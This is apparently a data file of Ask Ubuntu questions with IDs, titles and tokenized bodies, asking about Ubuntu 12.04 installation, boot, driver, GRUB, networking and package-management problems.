171400	how to resolve `` no suitable download server found '' when updating ?	i am a new user to ubuntu 12.04 . i have already connected to the internet ( without any firewall or proxy ) and can browse the web . but whenever i am trying to update ubuntu or trying to select the mirror for my location ( singapore ) it just gives this error : no suitable download server found . please check your internet connection . what can i do to fix this ?
171402	ubuntu 12.04 install failure ( will not boot )	i recently downloaded ubuntu 12.04 from the ubuntu website . i checked the md5 hash and it matched , so i burned the iso to a disk . the burn succeeded . i put the disk into my other computer , booted into the installer , and installed the computer . i used the guided partition map , downloaded updates and all of that . the installer reports that the installation has succeeded , so i restart the computer . the bios says `` loading os ... '' like normal , and adds dots as it tries to load the os . that is where it stays , forever . any help ? system specs : intel core i5 processor ( 3.1 ghz ) 8 gb ram hdd : seagate barracuda ( 250 gb ) motherboard : gigabyte ga-z68mx-ud2h-b3
171404	is there a way to lock my browser with a password ?	it would be ok if it was only with my login password , but i would like to lock both midori and firefox so that they can not be used without entering a password . i 'm running 12.04 .
171407	how do i get ubuntu to look somewhere for library files ?	i have installed openmpi and a package called cvode onto my ubuntu system , which is running in a virtual machine ( using virtualbox ) . there was one problem which was worked around by copying some library files to /usr/lib . in other words , the following happened when i tried the example programs that came with cvode : $ mpirun ./cvadvdiff_bnd cvadvdiff_bnd : error while loading shared libraries : libsundials_cvode.so.1 : can not open shared object file : no such file or directory $ sudo cp /home/jeff/sundials/instdir/lib/libsundials_cvode.so.1 /usr/lib/libsundials_cvode.so.1 $ mpirun cvadvdiff_bnd cvadvdiff_bnd : error while loading shared libraries : libsundials_nvecserial.so.0 : can not open shared object file : no such file or directory $ sudo cp /home/jeff/sundials/instdir/lib/libsundials_nvecserial.so.0 /usr/lib/libsundials_nvecserial.so.0 $ mpirun cvadvdiff_bnd 2-d advection-diffusion equation mesh dimensions = 10 x 5 total system size = 50 tolerance parameters : reltol = 0 abstol = 1e-05 at t = 0 max.norm ( u ) = 8.954716e+01 at t = 0.10 max.norm ( u ) = 4.132889e+00 nst = 85 at t = 0.20 max.norm ( u ) = 1.039294e+00 nst = 103 at t = 0.30 max.norm ( u ) = 2.979829e-01 nst = 113 at t = 0.40 max.norm ( u ) = 8.765774e-02 nst = 120 at t = 0.50 max.norm ( u ) = 2.625637e-02 nst = 126 at t = 0.60 max.norm ( u ) = 7.830425e-03 nst = 130 at t = 0.70 max.norm ( u ) = 2.329387e-03 nst = 134 at t = 0.80 max.norm ( u ) = 6.953434e-04 nst = 137 at t = 0.90 max.norm ( u ) = 2.115983e-04 nst = 140 at t = 1.00 max.norm ( u ) = 6.556853e-05 nst = 142 final statistics : nst = 142 nfe = 174 nsetups = 23 nfels = 0 nje = 3 nni = 170 ncfn = 0 netf = 3 the problems finding those two files were solved by copying them to /usr/lib . however , there are hundreds of files in ~/sundials/instdir/lib/ . how can i get ubuntu to look for those files in their current location instead of copying them all to /usr/lib/ ?
171409	i want to make flash cartoons , what do i need ?	first off , i do n't know much about flash yet , but i 'm going to learn it . i would like to have it installed on my computer first before starting to learn something , so i can learn and use it at the same time , since i 'm more of a hands on type learner and just reading about something is n't enough for me . i just would like to know what software i should download ?
171410	can i use 8.04 hardy packages or repositories on precise ?	i 'm using precise pangolin , and i sometimes notice packages i 'd like to install exist on http : //us.archive.ubuntu.com/ubuntu/ hardy main but not on http : //us.archive.ubuntu.com/ubuntu/ precise main . i have two related questions : is it safe to install these packages manually ( e.g . by downloading from http : //packages.ubuntu.com/hardy ? ) if so , can i also add the hardy sources to my /etc/apt/sources.list , like so ? deb http : //us.archive.ubuntu.com/ubuntu/ precise main restricted universe multiverse deb-src http : //us.archive.ubuntu.com/ubuntu/ precise main restricted universe multiverse deb http : //us.archive.ubuntu.com/ubuntu/ hardy main deb-src http : //us.archive.ubuntu.com/ubuntu/ hardy main
171412	how to play or convert a qcp file to mp3	exactly as the title says . my friend sent me a file which turns out to be a qcp file and i have been downloading all kinda of programs people told me to download and i have come up with nothing to convert this thing into an mp3 to listen to it . what program should i use to listen to qcp file ?
171427	wireless is n't working in 12.04	i 'm new to ubuntu and not very tech savvy . i have tried everything i 've seen on previous posts but still i 'm confused . so i know a lot of people request certain info . so here 's what i have : hp pavilion dv5000 . only ubuntu 12.04 running . $ lspci 00:00.0 host bridge : advanced micro devices [ amd ] nee ati rs480 host bridge ( rev 01 ) 00:01.0 pci bridge : advanced micro devices [ amd ] nee ati rs480 pci bridge 00:05.0 pci bridge : advanced micro devices [ amd ] nee ati rs480 pci bridge 00:13.0 usb controller : advanced micro devices [ amd ] nee ati ixp sb400 usb host controller 00:13.1 usb controller : advanced micro devices [ amd ] nee ati ixp sb400 usb host controller 00:13.2 usb controller : advanced micro devices [ amd ] nee ati ixp sb400 usb2 host controller 00:14.0 smbus : advanced micro devices [ amd ] nee ati ixp sb400 smbus controller ( rev 11 ) 00:14.1 ide interface : advanced micro devices [ amd ] nee ati ixp sb400 ide controller 00:14.3 isa bridge : advanced micro devices [ amd ] nee ati ixp sb400 pci-isa bridge 00:14.4 pci bridge : advanced micro devices [ amd ] nee ati ixp sb400 pci-pci bridge 00:14.5 multimedia audio controller : advanced micro devices [ amd ] nee ati ixp sb400 ac'97 audio controller ( rev 02 ) 00:14.6 modem : advanced micro devices [ amd ] nee ati ixp sb400 ac'97 modem controller ( rev 02 ) 00:18.0 host bridge : advanced micro devices [ amd ] k8 [ athlon64/opteron ] hypertransport technology configuration 00:18.1 host bridge : advanced micro devices [ amd ] k8 [ athlon64/opteron ] address map 00:18.2 host bridge : advanced micro devices [ amd ] k8 [ athlon64/opteron ] dram controller 00:18.3 host bridge : advanced micro devices [ amd ] k8 [ athlon64/opteron ] miscellaneous control 01:05.0 vga compatible controller : advanced micro devices [ amd ] nee ati radeon xpress 200m 5955 ( pcie ) 06:02.0 network controller : broadcom corporation bcm4318 [ airforce one 54g ] 802.11g wireless lan controller ( rev 02 ) 06:06.0 ethernet controller : realtek semiconductor co. , ltd. rtl-8139/8139c/8139c+ ( rev 10 )
171431	freenx sound fw	how can i get sound forwarding from a 12.04 to a 12.04 ubuntu machine ? i have tried a couple things i found on google , but none worked . there were not targetted towards ubuntu .
171434	is there any way to make nautilus use different colors when showing list of files ?	is there any way to make nautilus use different colors when showing list of files ? something similar to what ls does in console visually distinguishing archives , executable scripts etc ?
171435	getting dwa 123 dlink wireless usb adapter working	i compiled the source code and inserted the usb device , according to this blogs instruction : install dwa-125 wireless driver on ubuntu 11.10 when i do a lsmod : lsmod | grep rt rt5370sta 726167 0 however iwconfig gives : lo no wireless extensions . eth0 no wireless extensions . could someone please tell me what to do so that i can get the usb adapter running fine .
171437	desktop shortcut default action	i have a shortcut to a shell script on my desktop , and when i double click it the run in terminal/display/cancel/run dialog appears . is there any way to set a default action for this dialog ?
171439	how to install ubuntu ?	i have installed the wubi on my computer from an iso image . but when i boot ubuntu it says that press escape if you need to install through other method . it boots up and on the desktop there is this install `` ubuntu 12.04 lts '' thing and the examples folder present always . when i click on it nothing happens . it is not installing as whatever programs i install get erased as when i boot up again it still shows up istall ubuntu lts 12.04 on the desktop and my changes get erased ... . please help me to install i '' ve a slow internet connection and i 'm sick and tired of downloading it every time . thank you for answering ... . but the problem still persists ... . when i choose to `` install ubuntu '' from the boot menu , it still boots up ubuntu just like it does in the try option ... i 've burned the image to three blank cd 's and changed the speed from 52x to 40x to avoid any errors but still the problem persists ...
171440	how to disable nautilus just-type search ?	the new nautilus is nice ( even if i miss the f3 split ) but the `` just type '' search is so annoying in it 's interference with my everyday patterns . i work a lot with remote sftp filesystems and it 's pretty much broken by itself and also breaks ordinary navigation . i do n't want to `` search '' as i know exactly where 's my stuff and want to get to it with minimal effort . there 's a bug report , but that 's not quite `` bug '' and i hope there is something one could do to stop the damn thing from blasting in my face every time i launch nautilus to get somewhere .
171441	how to do quarantine or delete with clamav ?	i scanned the home directory using clamav which found 13 threats . the list was also displayed , but when i tried to delete or quarantine files , it did not proceed . any ideas ?
171446	how to fix the uuid in grub after restore from another machine ?	i want to restore a complete tar backup of ubuntu 12.04 with all my customizations , documents , installed software , etc . to a different machine . i made the backup with the following commands : sudo su cd / tar cvpzf ububackup.tgz -- exclude=/ububackup.tgz -- exclude=/proc -- exclude=/lost+found -- exclude=/sys -- exclude=/mnt -- exclude=/tmp -- exclude=/media / on the new computer i did a fresh install of ubuntu 12.04 , moved the backup file to it and then restored with the backup file with the following : tar xvpfz backup.tgz -c / as expected ( see mike whatever 's answer to this question : copy ubuntu distro with all settings from one computer to a different one ) this broke grub . when i turn on the computer i get an error : error : no such device : ... press any key to continue ... i believe the reason that grub is broken is that the uuid it is looking for matches on the old hard drive not on the hard-drive for the computer . how can i fix my grub to recognize the new hard-drive ? i looked online for help `` fix grub uuid '' but the steps seemed either out of date or complex . the response from mike i linked to above gives me hope that there is a fairly simple way to repair this .
171447	how i can install rrd module in perl ?	i 'm very new to ubuntu . i 'm using nagios graph plugin . that plugin needs perl rrd module to be installed on my system . how i can install that ? thanks in advance .
171449	shell does not show typed in commands , `` reset '' works , but what happened ?	my problem is that the bash shell stops showing the characters i type into it . it does read the commands though . i 've come across this problem quite a few times and i do n't understand what causes it . i know how to solve it , but i really do n't like it when i 'm `` voodooing '' my way of out of problems . i 'll describe the two ways i 've come across this problem : i 'm running a certain process , http : //pythonpaste.org/script/ and sometimes when i stop that or it breaks control is given back to the shell . when i then go and type commands into the shell , the characters i type do n't show up . when i press enter the commands are submitted . so for example : i type `` ls '' i only see an empty prompt and nothing more i press enter and i 'm given a listing of the files , in other words : the command is executed when i give the `` reset '' command the shell starts working normally again the second way this happens is when i give a command like this : $ grep foo * -l | xargs vim i use grep to find files that have a certain pattern and then i want to open all the files that result from the grep . this works like a charm ( although not as fast as i 'd hoped ) . but when i exit vim my shell stops showing the characters i type into it . a reset command resolves the problem . my guess is that both problems have an underlying reason , but i 'm kind of stumped on how or what that reason is . searching for this problem is itself problematic because the description is kind of vague and has no hard search-terms for it . edit giving the stty -- all command as per john s. gruber 's request gave the following output ( whitespace edited for readability ) speed 0 baud ; rows 53 ; columns 186 ; line = 0 ; intr = < undef > ; quit = < undef > ; erase = < undef > ; kill = < undef > ; eof = < undef > ; eol = < undef > ; eol2 = < undef > ; swtch = < undef > ; start = < undef > ; stop = < undef > ; susp = < undef > ; rprnt = < undef > ; werase = < undef > ; lnext = < undef > ; flush = < undef > ; min = 0 ; time = 0 ; -parenb -parodd cs8 -hupcl -cstopb cread -clocal -crtscts -ignbrk -brkint -ignpar -parmrk -inpck -istrip -inlcr -igncr -icrnl -ixon -ixoff -iuclc -ixany -imaxbel -iutf8 -opost -olcuc -ocrnl -onlcr -onocr -onlret -ofill -ofdel nl0 cr0 tab0 bs0 vt0 ff0 -isig -icanon -iexten -echo -echoe -echok -echonl -noflsh -xcase -tostop -echoprt -echoctl -echoke
171454	windows boot manager did n't come up as indicated in the instructions	i 'm not technical . i installed ubuntu using the wubi installer . when i pressed 'finish ' to restart , the windows boot manager did not come up . my computer just rebooted in windows . how do i get to this windows boot manager so i can switch operating systems ? i 'm using windows xp , by the way .
171456	will ubuntu work , if installed on flash drive ?	will i be able to use ubuntu as an independent os , if i run it from a flash drive ? in other words , will everything work like as if the os was installed on the actual hd of the system ? access graphics driver , networking , file share , play games , run vms etc ? edit : one more thing , lets say i boot the flash trough a vm and later through the pc it self , will this effect ubuntu on the flash badly ? or is this not recommended ?
171457	ca n't install tar.bz2 file due to `` no such file or directory '' error	i 've been trying compile mdk3-v6 but i run into errors . started off by trying sudo apt-get install that did n't work . downloaded from another source and tried tar -xjf mdk3-v6.tar.bz2 keep getting no such file directory error . also downloaded all the 32bit support since i 'm running 64bit & have the build essentials and all that . tried using -xzf instead of -xjf and other tasks . changed makefile to -pthread . i think i 've tried everything . if someone could help me out i 'd appreciate it .
171458	internet problems ubuntu 12.04	i have just installed ubuntu onto my laptop and i am having some difficulties with the internet . it tells me that it has connected to the network yet when i try to run firefox or try to update it is unable to do anything . i have tried using wireless and wired but im getting the same results from each . some help with this issue would be great .
171459	will ubuntu install necessary drivers for my computer ?	i am planning on installing ubuntu removing the existing windows vista . my question is , will ubuntu detect my hardware and install the necessary drivers ?
171460	having trouble with .tar.gz extraction	i tried to extract .tar.gz file using following command spgt @ ubuntu : ~ $ tar xvf 12.0sp1_232_quartus_free_linux.tar.gz but this is what i see after i press return tar : 12.0sp1_232_quartus_free_linux.tar.gz : can not open : no such file or directory tar : error is not recoverable : exiting now
171467	removing pulseaudio , moving to jack	i have installed jack because i want to use the ladspa plugins available , in jackrack , for realtime audio processing . ( i could n't find any way to use them with pulseaudio ) after much effort , i managed to get pulseaudio to work at the same time by getting to act as a source/sink under jack after installing pulseaudio-module-jack . still , as a solution , it is messy . i am wondering if i can remove pulseaudio . will all common applications be able to use jack instead of pulseaudio ? how much reconfiguring will there be ? what are the tricks involved in making it work ? any tips will be gratefully received .
171470	how to make unity 3d work with bumblebee using the intel chipset	i have a sony vaio s laptop with the dreaded optimus and finally managed to get bumblebee to work fully on ubuntu 12.04 so that i can utilize both the hardware acceleration of the intel chipset as well as the nvidia one via optirun and/or bumble-app-settings . however , the desktop effects do n't work . but they should , i vaguely remember that they worked for a while before i had bumblebee installed . this is what i get with the support test : : ~ $ /usr/lib/nux/unity_support_test -p xlib : extension `` nv-glx '' missing on display `` :0 '' . opengl vendor string : tungsten graphics , inc opengl renderer string : mesa dri intel ( r ) ivybridge mobile opengl version string : 1.4 ( 2.1 mesa 8.0.2 ) not software rendered : yes not blacklisted : yes glx fbconfig : yes glx texture from pixmap : yes gl npot or rect textures : yes gl vertex program : yes gl fragment program : yes gl vertex buffer object : no gl framebuffer object : yes gl version is 1.4+ : yes unity 3d supported : no first of all , i kind of doubt that the chipset does n't support vbos ( essentially a standard feature in gl ) . neither xorg.0.log nor xorg.8.log show any particular errors . as for the nvidia drivers : in order to get them to work , i had to install the 304.22 drivers ( older ones would n't work ) . they clobbered libglx.so , so i reinstated the xserver-xorg-core libglx.so in its original place , moved nvidia 's libglx.so to an nvidia-specific folder and specified that folder in the bumblebee.config . that seems to work and should n't cause the problem i see here . for fun , i tried to use the nvidia chipset for unity , but that did n't fly either : ~ $ optirun /usr/lib/nux/unity_support_test -p opengl vendor string : nvidia corporation opengl renderer string : geforce gt 640m le/pcie/sse2 opengl version string : 4.2.0 nvidia 304.22 not software rendered : yes not blacklisted : yes glx fbconfig : yes glx texture from pixmap : no gl npot or rect textures : yes gl vertex program : yes gl fragment program : yes gl vertex buffer object : yes gl framebuffer object : yes gl version is 1.4+ : yes unity 3d supported : no
171472	is there a browser that disables the rendering of images ?	i was just curious if there is a web browser for ubuntu that has the option to not show images and other resources like flash and videos for example . ( i do recall being able to play with a browser that uses the terminal to render the html page but do i have options other than that one ? )
171474	grub2 ca n't find windows on a dual boot system	i have a system with both windows and linux . in the last 3 years i have switched between opensuse and ubuntu , and two days ago i decided to install ubuntu . when i was done it was quite laggy , and in frustration i tried to reinstall . somehow , something went wrong and ubuntu quit the installation . i tried opensuse , but for an odd reason opensuse got a lot of errors regarding my windows partition . i decided to download the newest 64-bit version of ubuntu on my brothers pc and burn the cd there . now installation and everything went good , but when i restarted grub was n't loading at all . after some tweaking i got grub up and running , but windows was n't visible . but all my stuff and the windows files are visible and accessible in nautilus & dolphin , so it is there . after some reading on the web , i 'm pretty sure that my problem is that grub is installed in the windows partition . here 's my settings : linux sda1 - windows sda2 - swap sda5 what to do ?
171479	can not resume after suspending ubuntu 12.04 , using thinkpad t420s	i am aware that similar questions have been posted , and believe me , i have tried a lot of the solutions , but nothing works for me . so i think my case might just be special and deserves a new post . i 'm using thinkpad t420s , with nvidia nvs 4200m graphics card . i installed ubuntu 12.04 as soon as it came out , but suspend never worked properly . when i try to resume my computer after suspending it , i just get a lit but black screen . the only thing i 'm able to do is to turn off the machine using power button . at first i thought that 's an ubuntu issue , so i tried mint instead . however , i was surprised that i met the same problem using mint : the screen just remains black after being resumed from suspend ! i tried installing pm-utils as many suggested , but it did n't work . i tried installing laptop-mode-tools as many suggested , but it did n't work . i tried installing nvidia driver , but it did n't work ( weird that i could n't see any driver in `` additional drivers '' even though i installed the nvidia driver ) . so now i have no idea what to do and am here asking for help . thanks a lot for reading this ! any advice will be greatly appreciated .
171481	does folder and directories has their own size ?	i got a messege today that i have little free space left on my hard drive . i opened the utility/program which shows me how the hard drive usage , and i saw my `` downloads '' folder is 10.4 gb . picture : i then went to my `` downloads '' folder , pressed ctrl+h to view also hidden files and pressed ctrl+a to select them all and i saw all the files are 5.3 gb . so , is a folder are like a partition where it has free space which is included in the whole folder size ? or the folder is just a folder and there are still files and folders not being included in the size ? picture : thanks for your answer .
171489	how to unbind shift-alt up shortkey in 12.04 ?	how to unbind shift + alt + up shortkey in ubuntu 12.04 ? i ca n't find it in system 's keyboard shortcuts settings . i want to unbind this shortcut so i can use it in an application .
171493	failure to boot from usb	i have created a usb live disk and am trying to boot from it . the computer im using to learn linux on is a dell optiplex 755 4gb ram c2d 3.0ghz and im running windows 7 ultimate without any problems . however , when i boot from the usb in bios i get as far as the screen that has the ubuntu logo and some dots underneath which change from white to red and back etc ... .when i press the 'esc ' key i get a wall of error text to which i have no idea what it is indicating , all i know is ubuntu wo n't load at all via the usb and therefore ca n't install ubuntu on my hdd ( same issue occurs ) any idea what i should do ? p.s this site is fantastic for a average windows user wanting to know more about linux ... .
171498	thunderbird stops sending email	i am using ubuntu 12.04 lts and thunderbird 14 i have configured correctly all accounts using common local folders i send and receive correctly emails . suddenly , usually 4-5 hours after i switch the pc on , i can not send email but receive only . other information is that it is a dual boot pc with vista and both os are using same profile folder .
171499	ubuntu and windows 7 on 1 tb hard	can ' someone please tell me which is the best method of partitioning a samsung 1tb sata-ii 7200rpm 32mb rpm spinpoint f3 hd103sj hard disk given that in windows 7 i need a primary partition between 320-370 gb for data ( movies , music , work files ) . i heard that i should take into consideration how many platters hard disk has . is it true ? can someone please help.could you please tell me what is the best way for partitioning this hard disk ? thank you . i was thinking to do something like this : /dev/sda1 ntfs 100.00 mib boot /dev/sda2 ntfs 150 gib windows 7 /dev/sda3 ntfs 360 gib windows ( primary - files , work , movies ) /dev/sda4 extended 420 gib /dev/sda5 linux-swap 4 gib linux-swap /dev/sda6 ext4 / 90 gib ubuntu /dev/sda7 ntfs 320 gib windows ( logical - files )
171500	how do i solve a thermal issue on my hp dv6 laptop ?	i have hp dv6 6080 laptop with sandy bridge ci7 cpu and ati graphic . i have thermal issue and power usage in ubuntu . i followed the instructions from this tutorial to install hybrid graphic because i want to my laptop become cool in ubuntu . but after doing so , my laptop thermal does n't become cool . i tried to install new kernel 3.4 in order to fix these issues but after installing , it does n't boot in high graphic mode and need to me reconfigure graphic . how can i reconfigure graphic ? and how can i fix thermal issue in my laptop with 12.04 ?
171502	how do i determine my drive format ?	how do i find out what format my hard drive is in ?
171506	can no longer boot win7 after win7/ubuntu partition cloning to another drive . any idea ?	i recently changed the drive of my laptor , from 500g hdd to 256 ssd . i did the cloning using gparted for reducing and copying all partitions from hhd to ssd . after which i reinstalled grub on the new drive using the tutorial found there : http : //karuppuswamy.com/wordpress/2010/06/02/how-to-chroot-to-ubuntu-using-live-cd-to-fix-grub-rescue-prompt/ ubuntu started without any problems , but window refuses to start , with error : status : 0xc000000e info : the boot selection failed because a required device is inaccessible . fdisk -l output : partition boot start sector end sector # of sectors id system /dev/sda1 2,048 33,490,943 33,488,896 27 hidden ntfs ( recovery environment ) /dev/sda2 33,490,944 33,695,743 204,800 7 ntfs / exfat / hpfs /dev/sda3 33,695,744 197,535,743 163,840,000 7 ntfs / exfat / hpfs /dev/sda4 197,551,305 500,103,449 302,552,145 5 extended /dev/sda5 197,554,176 320,929,791 123,375,616 83 linux /dev/sda6 320,931,840 337,522,687 16,590,848 82 linux swap / solaris after investigation , in the process or reinstalled grub , i might have messed up a little , and started a first installation of grub on the window boot partition ( sda2 ) ( before `` re '' installing it to sda5 ) my bootinfo summary : ============================= boot info summary : =============================== = > grub2 ( v1.99 ) is installed in the mbr of /dev/sda and looks at sector 1 of the same hard drive for core.img . core.img is at this location and looks for ( , msdos5 ) /boot/grub on this drive . sda1 : __________________________________________________________________________ file system : ntfs boot sector type : windows vista/7 : ntfs boot sector info : no errors found in the boot parameter block . operating system : boot files : /bootmgr /boot/bcd sda2 : __________________________________________________________________________ file system : ntfs boot sector type : windows vista/7 : ntfs boot sector info : no errors found in the boot parameter block . operating system : boot files : /bootmgr /boot/bcd /grub/core.img sda3 : __________________________________________________________________________ file system : ntfs boot sector type : windows vista/7 : ntfs boot sector info : no errors found in the boot parameter block . operating system : windows 7 boot files : /windows/system32/winload.exe sda4 : __________________________________________________________________________ file system : extended partition boot sector type : - boot sector info : sda5 : __________________________________________________________________________ file system : ext4 boot sector type : - boot sector info : operating system : ubuntu 12.04 lts boot files : /boot/grub/grub.cfg /etc/fstab /boot/grub/core.img and my complete boot-repair report : http : //paste.ubuntu.com/1126849/ any idea on how to fix the problem ? i started to look at bootsect and bootrec window recovery commands , but i 'm afraid of breaking everything just a little more ... any help would be greatly appreciated .
171512	unable to install vmware workstation 8 on ubuntu 12.04	installing vmware 8.0.2 32bit ubuntu 12.04lts 32bit beta my kernel version is : 3.2.0-20-generic vendettaowner @ vendettaowner-desktop : ~ $ sudo sh vmware-workstation-full-8.0.2-591240.i386.bundle installs ok when i launch i am asked to install modules which are compiled and loaded into the running kernel . a window opens vmware kernel module updater this fails on virtual network device [ error log ] [ 1 ] . update : [ patch ] [ 2 ] . when i try to add patch , following error : vendettaowner @ vendettaowner-desktop : ~ $ sudo ./patch-modules_3.2.0.sh ./patch-modules_3.2.0.sh : line 42 : patch : command not found what i can do to lunch the patch i tried but without any useful please help me
171513	how to disable everytime checking of universe repo ?	as you know , every time you update your repositories in ubuntu 12.04 , the universe repository downloads all of it 's contents in your computer , whether they have been changed from the last time you update them or not . and in a country like mine where internet connection is too slow , it will cause some problems . is there a way to restrict downloading of the contents to the times when they really changed like the other repositories ? i do n't want to disable the universe repository , i just want it to treat like other repos and do n't get download every time i `` apt-get update ''
171516	driver for epson stylus c70 for ubuntu 12.04	i see solutions for other epson printers however my epson c70 is an older printer and not supported by other solutions i have seen . does anyone know of a solution for the c70 . thank you for any assistance given . david
171520	set default built-in audio in kde	i use ubuntu 12.04 and using kde for primary my de alongside unity . my problem is audio always detect hdmi for default . so when i 'd turned down the volume on my laptop , it did not happen . while the standard setting for sound on my laptop is a built-in stereo analogan not audio digital audio stereo ( hdmi ) . how to change the order built-in analog audio stereo became standard on kde .
171521	what is the password for `` ssh root @ localhost `` ?	i need to ssh to localhost using root account , by ssh root @ localhost . when it prompts for passwords , i can not login with all possible passwords . on setting of localhost machine , regular user xxx and root user share the same password ( the password that works for sudo -s ) , but it does not works for ssh root @ localhost . so where to look at the password for ssh root @ localhost ps : with the password , i can login to regular account on ssh xxx @ localhost . pps : to answer further questions on motivation of doing so , localhost is just a computer in a private network and setting up ssh root @ localhost is just to relieve some manual management in a prototype system .
171527	xchat broken after update / reboot	today , i did some updates to 12.04 , as i do weekly . i forgot to look at the impacted packages , because it mostly is just fine . after reboot , xchat does not spool through the freenode channels , consuming 90/100 % cpu . as a possible solution i backed up my log files and deleted the files from the directories that contained them . does anyone have suggestions to fix my xchat ?
171528	icedtea-plugin not working in chromium	the icedtea plugin is working in firefox , but not in chromium . chromium shows in about : plugins icedtea-web plugin ( using icedtea-web 1.2 ( 1.2-2ubuntu1.1 ) ) the icedtea-web plugin executes java applets . but java web apps are not starting . i have apt-cache policy icedtea-plugin icedtea-plugin : installed : 1.2-2ubuntu1.1 candidate : 1.2-2ubuntu1.1 apt-cache policy openjdk-6-jre openjdk-6-jre : installed : 6b24-1.11.3-1ubuntu0.12.04.1 candidate : 6b24-1.11.3-1ubuntu0.12.04.1 apt-cache policy chromium-browser chromium-browser : installed : 18.0.1025.168~r134367-0ubuntu0.12.04.1 candidate : 18.0.1025.168~r134367-0ubuntu0.12.04.1 apt-cache policy firefox firefox : installed : 14.0.1+build1-0ubuntu0.12.04.1 candidate : 14.0.1+build1-0ubuntu0.12.04.1 installed and am very greatful for all suggestions and ideas . thanks a lot
171532	ubuntu 10.04 freezing randomly and completelty	i have problem with my ubuntu 10.04 that installed on lenovo t420 laptop . it keep freezing randomly and i do n't know how to fix it . when it freeze , it freeze completely and the only way is to hold power button till poweroff then power it back on . dyas it 's working fine then suddenly freeze . can any one please assist me to resolve this problem , my system is 2 years and it 's business used . thanks alot .
171535	creating ubuntu 7.10 bootable usb ?	i 'm trying to make a bootable 7.10 usb but ca n't seem to find any software that supports older distributions of ubuntu . is there anyway around this ? thanks
171544	constant crashes and freezes after upgrade to 12.04	after a fresh install of 12.04 as an upgrade from 10.04 my computer keeps freezing . i have a 2.4ghz intel quad core processor , 4gb ram and an nvidia 8800gt card , which i suspect is the culprit . my problems include : complete freeze when playing flash video complete freeze when computer left idle ( regardless of whether screensaver is activated or not ) inability to wake from suspend xbmc consistently crashes if left idle i 've tried replacing the nvidia closed source drivers with nouveau - display detected as laptop , when i 'm running a desktop with a 24~ screen , with an inability to change resolution - and replacing nvidia drivers with x-swat drivers . i am not savvy enough to resolve these problems on my own , so before i change back to windows , can anyone help ? i have been quite surprised that 12.04 is such a retrograde step for me , with 10.04 being rock solid and providing an experience that in my hands , just worked . i appreciate that the computer is now nearly 5 years old , so am willing to upgrade parts if people think that , for example , i need to buy a different graphics card .
171545	verbose displayed halfly over text mode booting	i tried to boot my ubuntu into text mode with verbosity enabled , this is what i configured in /etc/default/grub : grub_cmdline_linux_default= '' text init=/sbin/init -- verbose vga=791 '' then update-grub and reboot . it turned out that , however , the first half of the booting output no verbose , after about 14 seconds the next half showed up , and very soon the login come out . this is the output at the beginning of the verbose displaying : [ 12.902147 ] init : mounted-tmp state changed from waiting to starting [ 12.902333 ] init : handling starting event [ 12.902786 ] init : mounted-tmp state changed from starting to pre-start [ 12.902975 ] init : mounted-tmp state changed from pre-start to spawned [ 12.914907 ] init : mounted-tmp main process ( 360 ) [ 12.915188 ] init : mounted-tmp state changed from spawned to post-start [ 12.919397 ] init : mounted-tmp state changed from post-start to running [ 12.921018 ] init : handling started event [ 12.932362 ] init : handling module-device-added event [ 12.993888 ] init : handling acpi-device-added event [ 13.005511 ] init : handling usb-device-added event [ 13.024811 ] init : handling acpi-device-added event [ 13.039924 ] init : handling acpi-device-added event [ 13.096252 ] init : handling acpi-device-added event [ 13.108895 ] init : handling acpi-device-added event [ 13.109732 ] piix4_smbus 0000:00:07.0 : smbus base address uninitialized - upgrade bios or use force_addr=0xaddr i also checked that the output messages was indeed complete in the log file /var/log/dmesg . i really want to see the complete verbose display scrolling over booting , does any one have a trick ? ps : guest os : ubuntu lts 12.04 host os : windows 7 using oracle virtualbox 4.1.18
171547	gnome shell slow on a fast computer	the computer is an elitebook 8540w : ati firepro 5800 ( using proprietary drivers ) i7 720qm 8gb ram ocz agility iii ssd ubuntu is freshly installed ( a week ago ) . i have set swapiness to 10 . when i 'm on ac , i have the governor ( using jupiter ) set on performance . top shows no process over 10 % and total never over 20 % . half of the ram is unused and swap is empty . and yet again , when i open a few browsers ( firefox with flash disabled ) , thunderbird , skype , smuxi , ide ( eclipse or jdev ) and maybe some other program i need for work , the system starts being sluggish ( desktop switching slow , overview slow ( if i press win key ) , scrolling in programs slow ) . is there any other thing i should tweak to make this thing run smoothly ? update1 : used iotop , to find out what 's hogging my io ( if anything ) : firefox was caching and hogging the resources , i 've increased the amount of memory it can use , still not nice but better , heard a leak was fixed in 15 , but it 's not in the updater yet ( will wait ) . also noticed that smuxi ( irc client ) was not playing nice , removed , switched to empathy ( default ) . added noatime to / disk mount , will post results after reboot .
171549	how can i boot clonezilla backup ?	i just created a backup using clonezilla to an usb stick . now i would like to boot from this usb stick , but i 'm getting a missing operating system error . how can i boot from the usb ?
171550	xdamage settings with nvidia	something i 've put up with for a seemingly long time ( it could be months , it could be years ) is that sometimes the screen does n't update properly when something happens . some examples : some tooltips just show the area of text , not the border or drop-sahdow . some tooltips just show the drop-shadow ( ! ) menus are a common issue . i often need to move my mouse around to get the items to show up . at least in vnc terms , this would me known as a screen `` damage '' problem but i 'm not using vnc . something in the graphics stack is n't redrawing the screen when a change has been made . some notes about my configuration : nvidia gtx 580 , binary driver ( 304.30 from xorg-edgers ) . the beta driver is a red herring . i 've had this problem in the stable versions of everything too . two monitors in one twinview screen compiz but not unity . no /etc/x11/xorg.conf configuration at all . any suggestions on where to start looking to fix this ? are there any magical nvidia configs i can test to make this work ?
171553	better way distribute apps	is there a way i can get the installed apps , drivers and media drivers etc i have installed on my current machine as a install file or separate ? i use to use aptoncd but this failed today . i need a better way to do this , and if i added a app on one pc to be able to place that on a flash/cd and install the app on another system . i have a few pc that are not connected to internet , and the internet is slow on those that are connected . having to download updates , apps , plugins and all those again on each pc or even when redoing a pc is time consuming and that frustrates me .
171555	is there way to accelerate package downloads in slow connections ?	i 'm using ubuntu 11.10 and i want to download all ( for a specified installation ) packages simultaneously and in chunks ( as in jdownloader ) for faster downloading speed . i wanted this because my shared internet connection has no internet load balancing mechanism . i 'm using my closest mirror mirror.learn.ac.lk/ubuntu ( sri lanka ) . i 've used ubuntu software center , synaptic package manager , apt-get and some other package managers to download packages . all of them are using a single connection for all packages which causes slow download ( in my connection ) . is it possible to or is there a way to , install an application to handle package downloads of any package manager ( even in update manager ) in simultaneous connections find a package manager specifically designed for slow connections ( uses simultaneous connections in downloads ) if above are impossible get a list of required packages ' urls manually download ( using a download accelerator ) move *.deb to /var/cache/apt/archives install packages please tell if you have a better way i 'm not expert with source code modifying and compiling . so please do not give that kind of answers i just want to know what is possible and what is the procedure .
